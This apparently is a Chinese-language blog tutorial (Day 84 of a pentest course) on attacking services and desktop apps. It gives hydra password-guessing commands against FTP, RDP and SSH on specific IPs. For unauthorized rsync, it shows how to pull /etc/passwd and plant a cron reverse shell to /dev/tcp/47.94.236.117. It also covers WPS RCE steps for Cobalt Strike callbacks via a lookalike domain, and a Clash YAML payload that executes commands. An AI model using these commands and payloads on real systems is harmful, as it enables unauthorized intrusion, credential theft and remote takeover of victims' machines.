• Day84:服务攻防-端口协议&桌面应用&QQ&WPS等RCE&hydra口令猜解&未授权检测


    目录

    端口协议-口令爆破&未授权

    弱口令爆破

    FTP:文件传输协议

    RDP:Windows远程桌面协议

    SSH:Linux安全外壳协议

    未授权案例(rsync)

    桌面应用-QQ&WPS&Clash

    QQ RCE 漏洞复现

    WPS RCE 漏洞复现

    Clas* RCE 漏洞复现


    知识点;

    1、端口协议-弱口令&未授权&攻击方式等

    2、桌面应用-社交类&文档类&工具类等

    常见语言开发框架:

    1. PHP:Thinkphp Laravel YII CodeIgniter CakePHP Zend等
    2. JAVA:Spring MyBatis Hibernate Struts2 Springboot等
    3. Python:Django Flask Bottle Turbobars Tornado Web2py等
    4. Javascript:Vue.js Node.js Bootstrap JQuery Angular等

    常见语言开发组件:(Java)  Apache Solr、Apache Shiro、Apache Struts2、Apache Flink、Flume、Dubbo、Redis、Logstash、ElasticSearch、Kafka、Ghidra、Minecraft、Apache hive、Datax、Streaming、Dolphin Scheduler、Storm、Spring、Aibaba FastJson、Jackson、Log4J、XSteam等。

    端口协议-口令爆破&未授权

    端口参考:https://mp.weixin.qq.com/s/xp_LOUmGImrRmkPrDqxKjw

    弱口令爆破

    服务爆破工具:https://github.com/vanhauser-thc/thc-hydra

    1. hydra是一个自动化的爆破工具,暴力破解弱密码,
    2. 是一个支持众多协议的爆破工具,已经集成到KaliLinux中,直接在终端打开即可
    3. -s PORT 可通过这个参数指定非默认端口。
    4. -l LOGIN 指定破解的用户,对特定用户破解。
    5. -L FILE 指定用户名字典。
    6. -p PASS 小写,指定密码破解,少用,一般是采用密码字典。
    7. -P FILE 大写,指定密码字典。
    8. -e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。
    9. -C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。
    10. -M FILE 指定目标列表文件一行一条。
    11. -o FILE 指定结果输出文件。
    12. -f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。
    13. -t TASKS 同时运行的线程数,默认为16
    14. -w TIME 设置最大超时的时间,单位秒,默认是30s。
    15. -v / -V 显示详细过程。
    16. server 目标ip
    17. service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。

    FTP:文件传输协议

    hydra -l test -P 10top1K.txt 47.110.53.159 ftp -V
    

    FTP的上传下载文件命令可以百度

    RDP:Windows远程桌面协议

    hydra -l administrator -P 10top1K.txt 47.110.53.159 rdp -V
    

    有时候目标可能会用到第三方远程控制软件(vnc、向日葵、TeamViewer等),而不用系统本身的rdp协议。

    因为这些第三方远程控制软件的控制效果要比原始的rdp协议更好,所以会出现这种情况。

    SSH:Linux安全外壳协议

    hydra -l root -P 10top1K.txt 47.110.53.159 ssh -V
    

    未授权案例(rsync)

    未授权检测工具:https://github.com/xk11z/unauthorized

    rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。

    判断:

    rsync rsync://120.27.220.186:57830/
    

    利用-读取文件:

    rsync rsync://120.27.220.186:57830/src/
    

    下载文件;

    rsync rsync://120.27.220.186:57830/src/etc/passwd ./ (./是下载到本地的路径)
    

    上传文件

    rsync -av passwd rsync://120.27.220.186:57830/src/tmp/passwd
    

    反弹shell

    获取信息

    rsync rsync://120.27.220.186:57830/src/etc/crontab /root/cron.txt
    

    创建文件

    1. touch shell
    2. #!/bin/bash
    3. /bin/bash -i >& /dev/tcp/47.94.236.117/5566 0>&1
    4. chmod +x shell

    上传文件

    rsync -av shell rsync://120.27.220.186:57830/src/etc/cron.hourly 
    

    等待接受反弹,需要等待比较久,因为cron.hourly 固定了每小时执行一次

    1. 其中
    2. 17 * * * * root cd / && run-parts --report /etc/cron.hourly
    3. 表示在每小时的第17分钟执行run-parts --report /etc/cron.hourly命令

    桌面应用-QQ&WPS&Clash

    QQ RCE 漏洞复现

    上线cs后门同理

    WPS RCE 漏洞复现

    影响版本:

    1. WPS Office 代码执行(QVD-2023-17241)
    2. WPS Office 2023个人版<11.1.0.15120
    3. WPS Office 2019企业版<11.8.2.12085

    RCE复现(弹计算器)

    127.0.0.1 clientweb.docer.wps.cn.cloudwps.cn
    

    上线CS

    1、简单分析1.html poc.docx

    1.html

    poc.docx

    修改配合联动上线CS

    修改html中的shellcode(C#)

    修改docx中的指向连接URL及修改本地hosts

    如何修改docx中的指向连接URL

    实战中怎么操作?

    VPS上申请{xxxxx}wps.cn域名

    域名上增加解析clientweb.docer.wps.cn.{xxxxx}wps.cn VPSIP上面

    VPSIP架设1.html网站服务,修改1.html上线shellcode

    Clas* RCE 漏洞复现

    前言,本文内容仅为技术科普,请勿用于非法用途!仅展示漏洞!

    影响版本:Windows v0.19.10版本及以下

    本地创立一个.yaml的文件

    1. port: 7890
    2. socks-port: 7891
    3. allow-lan: true
    4. mode: Rule
    5. log-level: info
    6. external-controller: :9090
    7. proxies:
    8. - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    9. type: socks5
    10. server: 127.0.0.1
    11. port: "17938"
    12. skip-cert-verify: true
    13. - name: abc
    14. type: socks5
    15. server: 127.0.0.1
    16. port: "8088"
    17. skip-cert-verify: true
    18. proxy-groups:
    19. -
    20. name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
    21. type: select
    22. proxies:
    23. - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>

    Profiles挑选导入.yaml

    切换节点之后成功调用代码执行

  • 相关阅读:
    centos LVM磁盘快照
    Hadoop IPC‘s epoch 8 is less than the last promised epoch 9 ; journal id:
    HTML期末学生大作业-宠物之家网页作业html+css+javascript
    【AI】Python 实现 KNN 手写数字识别
    x86架构中的外部中断结构-Part 1:中断控制器的演化
    通用场景图像分割
    HTML5基础汇总
    vue-admin-better前端页面-菜单-权限配置
    HTML+CSS+JavaScript仿京东购物商城网站 web前端制作服装购物商城 html电商购物网站
    机器学习之正态分布拟合
  • 原文地址:https://blog.csdn.net/qq_61553520/article/details/137119893